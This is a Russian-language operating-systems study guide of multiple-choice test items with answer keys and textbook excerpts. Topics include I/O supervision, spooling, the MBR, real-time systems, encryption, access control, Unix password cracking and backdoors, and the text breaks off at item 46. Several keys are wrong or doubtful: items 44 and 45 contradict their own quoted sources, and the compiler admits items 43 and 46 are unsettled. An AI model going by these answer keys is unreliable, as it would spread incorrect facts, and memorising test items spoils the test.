  1. Модуль супервизора операционной системы, иногда называемый супервизором задач, получает запросы от прикладных задач на выполнение тех или иных операций, в том числе на ввод-вывод. Эти запросы проверяются на корректность и, если они соответствуют спецификациям и не содержат ошибок, то обрабатываются дальше. В противном случае пользователю (задаче) выдается соответствующее диагностическое сообщение о недействительности (некорректности) запроса.

  2. Супервизор ввода-вывода получает запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы.

  3. Супервизор ввода-вывода вызывает соответствующие распределители каналов и контроллеров, планирует ввод-вывод (определяет очередность предоставления устройств ввода-вывода задачам, затребовавшим эти устройства). Запрос на ввод-вывод либо тут же выполняется, либо ставится в очередь на выполнение.

  4. Супервизор ввода-вывода инициирует операции ввода-вывода (передает управление соответствующим драйверам) и в случае управления вводом-выводом с использованием прерываний предоставляет процессор диспетчеру задач с тем, чтобы передать его первой задаче, стоящей в очереди на выполнение.

  5. При получении сигналов прерываний от устройств ввода-вывода супервизор идентифицирует эти сигналы (см. раздел «Прерывания» в главе 1) и передает управление соответствующим программам обработки прерываний.

  6. Супервизор ввода-вывода осуществляет передачу сообщений об ошибках, если таковые происходят в процессе управления операциями ввода-вывода.

  7. Супервизор ввода-вывода посылает сообщения о завершении операции ввода-вывода запросившей эту операцию задаче и снимает ее с состояния ожидания ввода-вывода, если задача ожидала завершения операции.

В случае, если устройство ввода-вывода является инициативным2, управление со стороны супервизора ввода-вывода будет заключаться в активизации соответствующего вычислительного процесса (перевод его в состояние готовности к выполнению).

ЗАДАНИЕ N 31 ( - выберите один вариант ответа) В режиме обмена с опросом готовности устройства ввода-вывода используется _____________ центрального процессора.

ВАРИАНТЫ ОТВЕТОВ:

1)

рационально время

2)

нерационально память

3)

нерационально время

4)

рационально память

ОТВЕТ: 3

Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту):

…имеется два основных режима ввода-вывода:

  1. режим обмена с опросом готовности устройства ввода-вывода;

  2. режим обмена с прерываниями.

1. режим обмена с опросом готовности устройства ввода-вывода.

Пусть для простоты рассмотрения этих вопросов управление вводом-выводом осуществляет центральный процессор. В этом случае часто говорят о работе программного канала обмена данными между внешними устройством и оперативной памятью (в отличие от канала прямого доступа к памяти, при котором управление вводом-выводом осуществляет специальное дополнительное оборудование). Итак, пусть центральный процессор посылает команду устройству управления, требующую, чтобы устройство ввода-вывода выполнило некоторое действие. Например, если мы управляем дисководом, то это может быть команда на включение двигателя или команда, связанная с позиционированием магнитных головок. Устройство управления исполняет команду, транслируя сигналы, понятные ему и центральному устройству, в сигналы, понятные устройству ввода-вывода. После выполнения команды устройство ввода-вывода (или его устройство управления) выдает сигнал готовности, который сообщает процессору о том, что можно выдать новую команду для продолжения обмена данными. Однако поскольку быстродействие устройства ввода-вывода намного меньше быстродействия центрального процессора (порой на несколько порядков), то сигнал готовности приходится очень долго ожидать, постоянно опрашивая соответствующую линию интерфейса на наличие или отсутствие нужного сигнала. Посылать новую команду, не дождавшись сигнала готовности, сообщающего об исполнении предыдущей команды, бессмысленно. В режиме опроса готовности драйвер, управляющий процессом обмена данными с внешним устройством, как раз и выполняет в цикле команду «проверить наличие сигнала готовности». До тех пор пока сигнал готовности не появится, драйвер ничего другого не делает. При этом, естественно, нерационально используется время центрального процессора.

2. режим обмена с прерываниями.

Гораздо выгоднее, выдав команду ввода-вывода, на время забыть об устройстве ввода-вывода и перейти на выполнение другой программы. А появление сигнала готовности трактовать как запрос на прерывание от устройства ввода-вывода. Именно эти сигналы готовности и являются сигналами запроса на прерывание. Режим обмена с прерываниями по своей сути является режимом асинхронного управления. Для того чтобы не потерять связь с устройством (после выдачи процессором очередной команды по управлению обменом данными и переключения его на выполнение других программ), может быть запущен отсчет времени, в течение которого устройство обязательно должно выполнить команду и выдать-таки сигнал запроса на прерывание. Максимальный интервал времени, в течение которого устройство ввода-вывода или его контроллер должны выдать сигнал запроса на прерывание, часто называют установкой тайм-аута. Если это время истекло после выдачи устройству очередной команды, а устройство так и не ответило, то делается вывод о том, что связь с устройством потеряна и управлять им больше нет возможности. Пользователь и/или задача получают соответствующее диагностическое сообщение.

ЗАДАНИЕ N 32 ( - выберите один вариант ответа) Понятия «виртуального устройства» по отношению к понятию «спулинга» …

ВАРИАНТЫ ОТВЕТОВ:

1)

соотносится как часть и целое

2)

является более широким

3)

является более узким

4)

тождественно

ОТВЕТ: 2

Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту):

Как известно, многие устройства и, прежде всего, устройства с последовательным доступом не допускают совместного использования. Такие устройства могут стать закрепленными за процессом, то есть их можно предоставить некоторому вычислительному процессу на все время жизни этого процесса. Однако это приводит к тому, что вычислительные процессы часто не могут выполняться параллельно — они ожидают освобождения устройств ввода-вывода. Чтобы организовать совместное использование многими параллельно выполняющимися задачами тех устройств ввода-вывода, которые не могут быть разделяемыми, вводится понятие виртуальных устройств. Принцип виртуализации позволяет повысить эффективность вычислительной системы.

Вообще говоря, понятие виртуального устройства шире, нежели понятие спулинга (spooling — Simultaneous Peripheral Operation On-Line, то есть имитация работы с устройством в режиме непосредственного подключения к нему). Основное назначение спулинга — создать видимость разделения устройства ввода-вывода, которое фактически является устройством с последовательным доступом и должно использоваться только монопольно и быть закрепленным за процессом. Например, мы уже говорили, что в случае, когда несколько приложений должны выводить на печать результаты своей работы, если разрешить каждому такому приложению печатать строку по первому же требованию, то это приведет к потоку строк, не представляющих никакой ценности. Однако если каждому вычислительному процессу предоставлять не реальный, а виртуальный принтер, и поток выводимых символов (или управляющих кодов для их печати) сначала направлять в специальный файл на диске (так называемый спул-файлspool-file) и только потом, по окончании виртуальной печати, в соответствии с принятой дисциплиной обслуживания и приоритетами приложений выводить содержимое спул-файла на принтер, то все результаты работы можно будет легко читать. Системные процессы, которые управляют спул-файлом, называются спулером чтения (spool-reader) или спулером записи (spool-writer).

ЗАДАНИЕ N 33 ( - выберите один вариант ответа) Каждый элемент таблицы оборудования условно называется …

ВАРИАНТЫ ОТВЕТОВ:

1)

UCB

2)

USB

3)

DCB

4)

DRT

ОТВЕТ: 1

Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту):

Исходя из принципа управления вводом-выводом исключительно через супервизор операционной системы и учитывая, что драйверы устройств ввода-вывода используют механизм прерываний для установления обратной связи центральной части с внешними устройствами, можно сделать вывод о необходимости создания по крайней мере трех системных таблиц.

Первая таблица (или список) содержит информацию обо всех устройствах ввода-вывода, подключенных к вычислительной системе. Назовем ее условно таблицей оборудования (equipment table), а каждый элемент этой таблицы пусть называется UCB (Unit Control Block — блок управления устройством ввода-вывода). Каждый элемент UCB таблицы оборудования, как правило, содержит следующую информацию об устройстве:

  • тип устройства, его конкретная модель, символическое имя и характеристики устройства;

  • способ подключения устройства (через какой интерфейс, к какому разъему, какие порты и линия запроса прерывания используются и т. д.);

  • номер и адрес канала (и подканала), если такие используются для управления устройством;

  • информация о драйвере, который должен управлять этим устройством, адреса секции запуска и секции продолжения драйвера;

  • информация о том, используется или нет буферизация при обмене данными с устройством, «имя» (или просто адрес) буфера, если такой выделяется из системной области памяти;

  • установка тайм-аута и ячейки для счетчика тайм-аута;

  • состояние устройства;

  • поле указателя для связи задач, ожидающих устройство;

  • возможно, множество других сведений.

ЗАДАНИЕ N 34 ( - выберите один вариант ответа) Для увеличения скорости выполнения приложений при необходимости предлагается использовать _____________ ввод-вывод.

ВАРИАНТЫ ОТВЕТОВ:

1)

асинхронный

2)

приоритетный

3)

автоматический

4)

синхронный

ОТВЕТ: 1

Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту):

Задача, выдавшая запрос на операцию ввода-вывода, переводится супервизором в состояние ожидания завершения заказанной операции. Когда супервизор получает от секции завершения сообщение о том, что операция завершилась, он переводит задачу в состояние готовности к выполнению, и она продолжает выполняться. Эта ситуация соответствует синхронному вводу-выводу. Синхронный ввод-вывод является стандартным для большинства операционных систем. Чтобы увеличить скорость выполнения приложений, было предложено при необходимости использовать асинхронный ввод-вывод.

Простейшим вариантом асинхронного вывода является так называемый буферизованный вывод данных на внешнее устройство, при котором данные из приложения передаются не непосредственно на устройство ввода-вывода, а в специальный системный буфер — область памяти, отведенную для временного размещения передаваемых данных. В этом случае логически операция вывода для приложения считается выполненной сразу же, и задача может не ожидать окончания действительного процесса передачи данных на устройство. Реальным выводом данных из системного буфера занимается супервизор ввода-вывода. Естественно, что выделение буфера из системной области памяти берет на себя специальный системный процесс по указанию супервизора ввода-вывода. Итак, для рассмотренного случая вывод будет асинхронным, если, во-первых, в запросе на ввод-вывод указано на необходимость буферизации данных, а во-вторых, устройство ввода-вывода допускает такие асинхронные операции, и это отмечено в UCB.

ЗАДАНИЕ N 35 ( - выберите один вариант ответа) Программа, расположенная в главной загрузочной записи, называется _____________ загрузчиком.

ВАРИАНТЫ ОТВЕТОВ:

1)

системным

2)

внесистемным

3)

начальным

4)

локальным

ОТВЕТ: 2

Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту):

Разделение всего дискового пространства на разделы полезно по нескольким соображениям. Во-первых, это структурирует хранение данных. Например, выделение отдельного раздела под операционную систему и программное обеспечение и другого раздела под данные пользователей позволяет отделить последние от системных файлов и не только повысить надежность системы, но и сделать более удобным ее обслуживание. Во-вторых, на каждом разделе может быть организована своя файловая система, что иногда бывает необходимо. Например, при установке операционной системы Linux нужно иметь не менее двух разделов, поскольку файл подкачки (страничный файл) должен располагаться в отдельном разделе. Наконец, в ряде случаев на компьютере может потребоваться установка более одной операционной системы.

Для того чтобы системное программное обеспечение получило информацию о том, как организовано хранение данных на каждом конкретном накопителе, нужно разместить в одном из секторов соответствующие данные. Даже если НЖМД используется как единственный логический диск, все равно нужно указать, что имеется всего один диск, и его размер. Структура данных, несущая информацию о логической организации диска, вместе с небольшой программой, с помощью которой можно ее проанализировать, а также найти и загрузить в оперативную память программу загрузки операционной системы, получила название главной загрузочной записи (Master Boot Record, MBR). MBR располагается в самом первом секторе НЖМД, то есть в секторе с координатами 0-0-1. Программа, расположенная в MBR, носит название внесистемного загрузчика (Non-System Bootstrap, NSB).

ЗАДАНИЕ N 36 ( - выберите один вариант ответа) Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной …

ВАРИАНТЫ ОТВЕТОВ:

1)

кластеризации

2)

буферизации

3)

диспетчеризации

4)

приоритезации

ОТВЕТ: 2

Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту):

Как известно, накопители на магнитных дисках обладают крайне низким быстродействием по сравнению с процессорами и оперативной памятью. Разница составляет несколько порядков. Например, современные процессоры за один такт работы, а они работают уже с частотами в несколько гигагерц, могут выполнять по две операции, и, таким образом, время выполнения операции (с позиции внешнего наблюдателя, который не видит конвейеризации при выполнении машинных команд, позволяющей увеличить производительность в несколько раз) может составлять менее 0,5 не (!). В то же время переход магнитной головки с дорожки на дорожку занимает несколько миллисекунд; подобная же задержка требуется и на поиск нужного сектора данных. Как известно, в современных приводах средняя длительность на чтение случайным образом выбранного сектора данных составляет около 20 мс, что существенно медленнее, чем выборка команды или операнда из оперативной памяти и уж тем более из кэш-памяти. Правда, после этого данные читаются большим пакетом (сектор, как мы уже говорили, имеет размер 512 байт, а при операциях с диском часто читаются или записываются сразу несколько секторов). Таким образом, средняя скорость работы процессора с оперативной памятью на 2-3 порядка выше, чем средняя скорость передачи данных из внешней памяти на магнитных дисках в оперативную память.

Для того чтобы сгладить такое сильное несоответствие в производительности основных подсистем, используется буферизация и/или кэширование данных в дисковом кэше (disk cache). Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной буферизации. Ее суть заключается в том, что пока в один буфер заносятся данные с магнитного диска, из второго буфера ранее считанные данные могут быть прочитаны и переданы в запросившую их задачу. Аналогично и при записи данных. Буферизация используется во всех операционных системах, но помимо буферизации применяется и кэширование. Кэширование исключительно полезно в том случае, когда программа неоднократно читает с диска одни и те же данные. После того как они один раз будут помещены в кэш, обращений к диску больше не потребуется, и скорость работы программы значительно возрастет.

ЗАДАНИЕ N 37 ( - выберите один вариант ответа) Операционная система реального времени должна обеспечивать …

ВАРИАНТЫ ОТВЕТОВ:

1)

делегирование полномочий

2)

наследование приоритетов

3)

пакетную обработку

4)

клонирование пользователей

ОТВЕТ: 2

Комментарий (ответ из книги И.Б. Бурдонов, А.С. Косачев,В.Н. Пономаренко Операционные системы реального времени http://citforum.ru/operating_systems/rtos/1.shtml):

Операционные системы реального времени (ОСРВ) предназначены для обеспечения интерфейса к ресурсам критических по времени систем реального времени. Основной задачей в таких системах является своевременность (timeliness) выполнения обработки данных.

В качестве основного требования к ОСРВ выдвигается требование обеспечения предсказуемости или детерминированности поведения системы в наихудших внешних условиях, что резко отличается от требований к производительности и быстродействию универсальных ОС. Хорошая ОСРВ имеет предсказуемое поведение при всех сценариях системной загрузки (одновременные прерывания и выполнение потоков).

Принято различать системы мягкого (soft) и жесткого (hard) реального времени. В системах жесткого реального времени неспособность обеспечить реакцию на какие-либо события в заданное время ведет к отказам и невозможности выполнения поставленной задачи.

Системы мягкого реального времени могут не успевать решать задачу, но это не приводит к отказу системы в целом. В системах реального времени необходимо введение некоторого директивного срока (в англоязычной литературе – deadline), до истечения которого задача должна обязательно (для систем мягкого реального времени – желательно) выполниться.

-----примеры из вики:

Системы жёсткого реального времени не допускают задержек реакции системы, так как это может привести к:

  • потере актуальности результатов

  • большим финансовым потерям

  • авариям и катастрофам

Большинство программного обеспечения ориентировано на «мягкое» реальное время. Для подобных систем характерно:

  • гарантированное время реакции на внешние события (прерывания от оборудования);

  • жёсткая подсистема планирования процессов (высокоприоритетные задачи не должны вытесняться низкоприоритетными, за некоторыми исключениями);

  • повышенные требования к времени реакции на внешние события или реактивности (задержка вызова обработчика прерывания не более десятков микросекунд, задержка при переключении задач не более сотен микросекунд)

Классическим примером задачи, где требуется ОСРВ, является управление роботом, берущим деталь с ленты конвейера. Деталь движется, и робот имеет лишь маленький промежуток времени, когда он может её взять. Если он опоздает, то деталь уже не будет на нужном участке конвейера, и следовательно, работа не будет выполнена, несмотря на то, что робот находится в правильном месте. Если он подготовится раньше, то деталь ещё не успеет подъехать, и он заблокирует ей путь.

----

Мартин Тиммерман сформулировал следующие необходимые требования для ОСРВ [DEDSYS]:

  • ОС должна быть многозадачной и допускающей вытеснение (preemptable),

  • ОС должна обладать понятием приоритета для потоков,

  • ОС должна поддерживать предсказуемые механизмы синхронизации,

  • ОС должна обеспечивать механизм наследования приоритетов,

  • поведение ОС должно быть известным и предсказуемым (задержки обработки прерываний, задержки переключения задач, задержки драйверов и т.д.); это значит, что во всех сценариях рабочей нагрузки системы должно быть определено максимальное время отклика.

ЗАДАНИЕ N 38 ( - выберите один вариант ответа) К невыгружаемым относятся такие ресурсы, которые не могут быть …

ВАРИАНТЫ ОТВЕТОВ:

1)

загружены в память

2)

выгружены из памяти

3)

отобраны у процесса

4)

отобраны у процессора

ОТВЕТ: 3

Комментарий (ответ http://www.moodle.ipm.kstu.ru/mod/page/view.php?id=56):

Взаимоблокировка процессов может происходить, когда несколько процессов борются за один ресурс.

Ресурсы бывают выгружаемые и невыгружаемые, аппаратные и программные.

Выгружаемый ресурс - этот ресурс безболезненно можно забрать у процесса (например: память).

Невыгружаемый ресурс - этот ресурс нельзя забрать у процесса без потери данных (например: принтер).

Проблема взаимоблокировок процессов возникает при борьбе за невыгружаемый ресурсы.

ЗАДАНИЕ N 39 ( - выберите один вариант ответа) Интерфейс прикладного программирования предназначен для использования прикладными программами …

ВАРИАНТЫ ОТВЕТОВ:

1)

системных ресурсов компьютера

2)

регистров общего назначения процессора

3)

интерпретатора команд пользователя

4)

адресного пространства процесса

ОТВЕТ: 1

Комментарий (ответ из книги Гордеева-питер,2007г.-стр.298):

Необходимо однозначно разделить общий термин API (Application Program Interface — интерфейс прикладного программирования) на следующие направления:

• API как интерфейс высокого уровня, принадлежащий к библиотекам RTL (Run Time Library - библиотека времени выполнения);

• API прикладных и системных программ, входящих в поставку операционной

системы;

• прочие интерфейсы API.

Интерфейс прикладного программирования, как это и следует из названия, предназначен для использования прикладными программами системных ресурсов компьютера и реализуемых операционной системой разнообразных системных функций. API описывает совокупность функций и процедур, принадлежащих ядру или надстройкам операционной системы.

Итак, API — это набор функций, предоставляемых системой программирования разработчику прикладной программы и ориентированных на организацию взаимодействия результирующей прикладной программы с целевой вычислительной системой.

Целевая вычислительная система представляет собой совокупность программных и аппаратных средств, в окружении которых выполняется результирующая программа. Сама результирующая программа порождается системой программирования на основании кода исходной программы, созданного разработчиком, а также объектных модулей и библиотек, входящих в состав системы программирования.

ЗАДАНИЕ N 40 ( - выберите несколько вариантов ответа) По режиму обработки задач различают операционные системы, обеспечивающие _________ режим

ВАРИАНТЫ ОТВЕТОВ:

1)

мультипрограммный

2)

виртуальный

3)

однопрограммный

4)

многопользовательский

ОТВЕТ: 1,3

Комментарий (ответ из http://sga-informatika.ru/153303/136-211-operating-systems.html):

По режиму обработки задач различают ОС, обеспечивающие однопрограммный и мультипрограммный режимы. Под мультипрограммированием понимается способ организации вычислений, когда на однопроцессорной вычислительной системе создается видимость одновременного выполнения нескольких программ. Любая задержка в решении программы (например, для осуществления операций ввода/вывода данных) используется для выполнения других (таких же, либо менее важных) программ.

ЗАДАНИЕ N 41 ( - выберите один вариант ответа) Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц.

ВАРИАНТЫ ОТВЕТОВ:

1)

вызова утилит операционной системы

2)

диспетчера приложений

3)

вредоносных программ

4)

подбора пароля

p.s.: не совсем корректный вопрос и варианты ответа.

ОТВЕТ: 3

Комментарий (ответ из http://maloir.ucoz.ru/publ/kto_takie_internet_zombi_chast_1/1-1-0-14):

Кто такие интернет – зомби.

Ботнеты существуют уже около 10 лет, и приблизительно столько же эксперты предупреждают о той опасности, которую они представляют. Тем не менее, проблема ботнетов по-прежнему остается недооцененной, и многие пользователи (до тех пор пока им не отключат Интернет, пока они не обнаружат исчезновение денег с кредитных карт или у них не украдут почтовый ящик или аккаунт IM - Instant messaging - сервис, предназначенный для обмена сообщениями в режиме реального времени) плохо понимают, в чем состоит реальная угроза зомби-сетей.

Ботнет — это сеть компьютеров, зараженных вредоносной программой поведения Backdoor. Backdoor’ы позволяют киберпреступникам удаленно управлять зараженными машинами (каждой в отдельности, частью компьютеров, входящих в сеть, или всей сетью целиком) без ведома пользователя. Такие программы называются ботами. Ботнеты обладают мощными вычислительными ресурсами, являются грозным кибероружием и хорошим способом зарабатывания денег для злоумышленников. При этом зараженными машинами, входящими в сеть, хозяин ботнета может управлять откуда угодно: из другого города, страны или даже с другого континента, а организация Интернета позволяет делать это анонимно. Управление компьютером, который заражен ботом, может быть прямым и опосредованным. В случае прямого управления злоумышленник может установить связь с инфицированным компьютером и управлять им, используя встроенные в тело программы-бота команды. В случае опосредованного управления бот сам соединяется с центром управления или другими машинами в сети, посылает запрос и выполняет полученную команду. В любом случае хозяин зараженной машины, как правило, даже не подозревает о том, что она используется злоумышленниками. Именно поэтому зараженные вредоносной программой-ботом компьютеры, находящиеся под тайным контролем киберпреступников, называют еще зомби-компьютерами, а сеть, в которую они входят, – зомби-сетью. Чаще всего зомби-машинами становятся персональные компьютеры домашних пользователей.

Более подробную информацию по данному вопросу можно почитать тут:

http://maloir.ucoz.ru/publ/kto_takie_internet_zombi_chast_1/1-1-0-14

ЗАДАНИЕ N 42 ( - выберите один вариант ответа) Недостаток систем шифрования с секретным ключом состоит в том, что …

ВАРИАНТЫ ОТВЕТОВ:

1)

отправитель сообщения не может его расшифровать

2)

отправитель и получатель должны иметь общий секретный ключ

3)

объем вычислений при дешифровании намного больше, чем при шифровании

4)

объем вычислений при шифровании намного больше, чем при дешифровании

ОТВЕТ: 2

Комментарий (ответ из http://www.intuit.ru/department/security/netsec/12/netsec_12.html):

Существует два основных типа шифрования:

  • с секретным (закрытым) ключом;

  • с открытым ключом.

При шифровании с секретным ключом требуется, чтобы все стороны, имеющие право на прочтение информации, имели один и тот же ключ. Это позволяет свести общую проблему безопасности информации к проблеме обеспечения защиты ключа. Шифрование с открытым ключом является наиболее широко используемым методом шифрования. Он обеспечивает конфиденциальность информации и гарантию того, что информация остается неизменной в процессе передачи.

http://sevidi.ru/phpstroy/stroypage72.php :

Шифрование с закрытым ключом основано на том, что доступ к ключу имеет только авторизованный персонал. Этот ключ должен держаться в секрете. Если ключ попадет в нехорошие руки, посторонний сможет получить несанкционированный доступ к зашифрованной информации. Явный недостаток алгоритмов с закрытым ключом состоит в том, что для отправки кому-то защищенного сообщения необходимо располагать безопасным способом передачи этому лицу закрытого ключа. А если у вас есть безопасный метод передачи ключа, то почему не воспользоваться этим же методом для передачи сообщений? К счастью, в 1976 году произошел прорыв, когда Дифи и Хелман опубликовали первый алгоритм шифрования с открытым ключом.

Шифрование с открытым ключом базируется на двух различных ключах — открытом и закрытом. Как показано на рисунке, открытый ключ используется для шифрования сообщений, а закрытый — для их дешифрации. Любой человек, которому вы передали свой открытый ключ, может отправить вам защищенное сообщение. Но поскольку закрытым ключом обладаете только вы, только вы и сможете дешифровать сообщение. Наиболее известный алгоритм с открытым ключом — это алгоритм RSA. Огромным преимуществом алгоритмов с открытым ключом является возможность передачи открытого ключа по незащищенному каналу, не беспокоясь. что он будет прочитан третьей стороной. Несмотря на это, системы с закрытым ключом все еще используются повсеместно. Часто можно встретить гибридные системы. В таких системах алгоритм с открытым ключом применяется для передачи закрытого ключа, который используется для обмена данными до конца связи. Эта дополнительная сложность компенсируется тем, что алгоритмы с закрытым ключом работают на три порядка быстрее алгоритмов с открытым ключом.

Скорее всего данный вопрос формулировался строго по Таненбауму. Современные операционные системы. Питер-2002г,Стр. 647:

ЗАДАНИЕ N 43 ( - выберите один вариант ответа) Объектами защиты в компьютерных системах могут быть …

ВАРИАНТЫ ОТВЕТОВ:

1)

устройства отображения информации ?

2)

Помещения ?

3)

Сотрудники ?

4)

программы

ОТВЕТ:1, 2 или 3

Комментарий: однозначного ответа нет, т.к. куча источников, которые пишут разные вещи, а рекомендуемой литературы нет. Посмотрите по этому вопросу еще инф-ю.

Информация из 4-х разных источников, изучив их сложно сказать какой из ответов верный:

  1. В качестве объектов защиты информации в системах обработки данных можно выделить следующие:

* терминалы пользователей (персональные компьютеры, рабочие станции сети);

* терминал администратора сети или групповой абонентский узел;

* узел связи;

* средства отображения информации;

* средства документирования информации;

* машинный зал (компьютерный или дисплейный) и хранилище носителей информации;

* внешние каналы связи и сетевое оборудование;

* накопители и носители информации.

  1. из этого материала следует один правильный ответ – сотрудники:

Несанкционированная модификация информации о безопасности системы может привести к несанкционированным действиям (неверной маршрутизации или утрате передаваемых данных) или искажению смысла передаваемых сообщений. Целостность аппаратуры нарушается при ее повреждении, похищении или незаконном изменении алгоритмов работы. Угрозы доступности данных. Возникают в том случае, когда объект (пользователь или процесс) не получает доступа к законно выделенным ему службам или ресурсам. Эта угроза реализуется захватом всех ресурсов, блокированием линий связи несанкционированным объектом в результате передачи по ним своей информации или исключением необходимой системной информации.

  1. из этого материала следует два правильных ответа, хотя д.б. один (помещения, сотрудники)

Объектом защиты информации является компьютерная система или автоматизированная система обработки данных (АСОД). При решении проблемы защиты информации в КС необходи­мо учитывать также противоречивость человеческого фактора системы. Обслуживающий персонал и пользователи могут быть как объектом, так и источником несанкционированного воздейст­вия на информацию.

Понятие «объект защиты» или «объект» чаще трактуется в более широком смысле. Для сосредоточенных КС или элементов распределенных систем понятие «объект» включает в себя не только информационные ресурсы, аппаратные, программные средства, обслуживающий персонал, пользователей, но и поме­щения, здания, и даже прилегающую к зданиям территорию.

  1. из этого материала следует два правильных ответа, хотя д.б. один (помещения, сотрудники)

http://library.tuit.uz/skanir_knigi/book/iformacionnaya_bezopasnost/glav_7_8_9.htm#glav_7 :

Под объектами защиты КС обычно понимается такой структурный компонент компьютерной системы, в котором нахо­дится или может находиться подлежащая защите конфиденци­альная информация. Объект, на котором производятся работы с конфиденциальной информацией, имеет, как правило, несколько рубежей или контуров защиты. В их числе можно выделить кон­тролируемую территорию, здания, помещения, устройства КС, носители информации и т.д.

ЗАДАНИЕ N 44 ( - выберите один вариант ответа) Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на ...

ВАРИАНТЫ ОТВЕТОВ:

1)

пользователей

2)

прикладную программу

3)

операционную систему

4)

руководителей подразделений

p.s.: тоже странный вопрос, видимо его надо трактовать так: только руководитель конкретного подразделения понимает кому и что видеть, делать и пр, а он уже потом в свою очередь все расскажет админу.

ОТВЕТ: 4

Комментарий(ответ из http://proweb.info/informatsionnaja_bezopasnost/kriterii_opredelenija_bezopasnosti_komputernih_sistem/):

Принудительное управление доступом основано на сопоставлении меток безопасности субъекта и объекта. Субъект может читать информацию из объекта, если уровень секретности субъекта не ниже, чем у объекта, а все категории, перечисленные в метке безопасности объекта, присутствуют в метке субъекта. В таком случае говорят, что метка субъекта доминирует над меткой объекта. Субъект может записывать информацию в объект, если метка безопасности объекта доминирует над меткой субъекта. В частности, «конфиденциальный» субъект может писать в секретные файлы, но не может — в несекретные (разумеется, должны также выполняться ограничения на набор категорий). На первый взгляд подобное ограничение может показаться странным, однако оно вполне разумно. Ни при каких операциях уровень секретности информации не должен понижаться, хотя обратный процесс вполне возможен.

Разделы и классы

Критерии делятся на 4 раздела: D, C, B и A, из которых наивысшей безопасностью обладает раздел A. Каждый дивизион представляет собой значительные отличия в доверии индивидуальным пользователям или организациям. Разделы C, B и A иерархически разбиты на серии подразделов, называющиеся классами: C1, C2, B1, B2, B3 и A1. Каждый раздел и класс расширяет или дополняет требования указанные в предшествующем разделе или классе.

D — Минимальная защита

Системы, безопасность которых была оценена, но оказалась не удовлетворяющей требованиям более высоких разделов.

C — Дискреционная защита

  • C1 — Дискреционное обеспечение секретности.

    • Разделение пользователей и данных

    • Дискреционное управление доступом, допускающее принудительное ограничение доступа на индивидуальной основе.

  • C2 — Управление доступом

    • Более чётко оформленное дискреционное управление доступом.

    • Индивидуальные учётные записи, вход под которыми возможен через процедуру авторизации.

    • Журнал контроля доступа к системе.

    • Изоляция ресурсов.

B — Мандатная защита

  • B1 — Защита с применением мета-безопасности

    • Мандатное управление доступом к выбранными субъектам и объектам.

    • Все обнаруженные недостатки должны быть устранены или убраны каким-либо другим способом.

    • Маркировка данных

  • B2 — Структурированная защита

    • Чётко определённая и документированная модель правил безопасности.

    • Применение расширенного дискреционного и мандатного управления доступом ко всем объектам и субъектам.

    • Скрытые каналы хранения.

  • B3 — Домены безопасности

    • Соответствие требованиям монитора обращений.

    • Структурирование для исключения кода не отвечающего требованиям обязательной политики безопасности.

    • Поддержка администратора системы безопасности.

    • Примером подобной системы является XTS-300, предшественница XTS-400.

A — Проверенная защита

  • A1 — Проверенный дизайн.

    • По функциям идентично B3.

    • Формализованный дизайн и проверенные техники, включающие высокоуровневую спецификацию.

    • Формализованные процедуры управления и распространения.

    • Примером подобной системы является SCOMP, предшественница XTS-400.

  • Выше A1

    • Системная архитектура демонстрирующая, что требования самозащиты и полноценности для мониторов обращений были выполнены в соответствии с «Базой безопасных вычислений» (коллекцией программного и аппаратного обеспечения необходимых для обязательной политики безопасности в операционных системах ориентированных на безопасность).

Классы безопасности

    • "Оранжевая книга" Министерства обороны США открыла путь к ранжированию информационных систем по степени доверия безопасности.

    • В "Оранжевой книге" определяется четыре уровня доверия - D, C, B и A:

    • уровень C - произвольное управление доступом;

    • уровень B - принудительное управление доступом;

    • уровень A - верифицируемая безопасность.

    • уровень D предназначен для систем, признанных неудовлетворительными.

По мере перехода от уровня C к A к системам предъявляются все более жесткие требования. Уровни C и B подразделяются на классы (C1, C2, B1, B2, B3) с постепенным возрастанием степени доверия.

    • Всего имеется шесть классов безопасности - C1, C2, B1, B2, B3, A1. Чтобы в результате процедуры сертификации систему можно было отнести к некоторому классу, ее политика безопасности и уровень гарантированности должны удовлетворять заданным требованиям.

(Подробное описание классов представлено http://proweb.info/informatsionnaja_bezopasnost/kriterii_opredelenija_bezopasnosti_komputernih_sistem/)

ЗАДАНИЕ N 45 ( - выберите один вариант ответа) Защита зашифрованных паролей в UNIX взламывается путем …

ВАРИАНТЫ ОТВЕТОВ:

1)

шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей

2)

привлечения инсайдеров в качестве сообщников

3)

расшифровки всех паролей после копирования файла паролей

4)

вычисления пароля путем свертки идентификатора пользователя

ОТВЕТ: 1,3

Комментарий (ответ http://www.supermegayo.ru/antihack/30.html):

На любом UNIXe (если не используется система специальной защиты) файл с паролями находится в директории etc, в файле passwd. Файл зашифрован необратимо и программы для его обратного деко­дирования просто не существует, но есть другая возможность: ко­дировать слова (возможные пароли) и сравнивать получившийся ко­дированный вариант со всеми зашифрованными паролями в файле passwd. Хакеры создали программы, делающие это автоматически, но для полноценной работы вам понадобится довольно быстрый компью­тер и хороший словарь с возможными паролями.

ЗАДАНИЕ N 46 ( - выберите один вариант ответа) Лазейки в программах создаются …

ВАРИАНТЫ ОТВЕТОВ:

1)

для облегчения отладки программ или в противоправных целях

2)

только для противоправных целей

3)

для внедрения в программу постороннего кода

4)

только для облегчения отладки программ

ОТВЕТ: 4 (может и 1?)

p.s.: вообще однозначно утверждать, что 4-й ответ верный сложно, т.к. может и программист быть не чист на руку и поэтому ответ 1 в итоге может оказаться правильным.

Комментарий (ответ из http://zarodinu.org.ua/page/410):

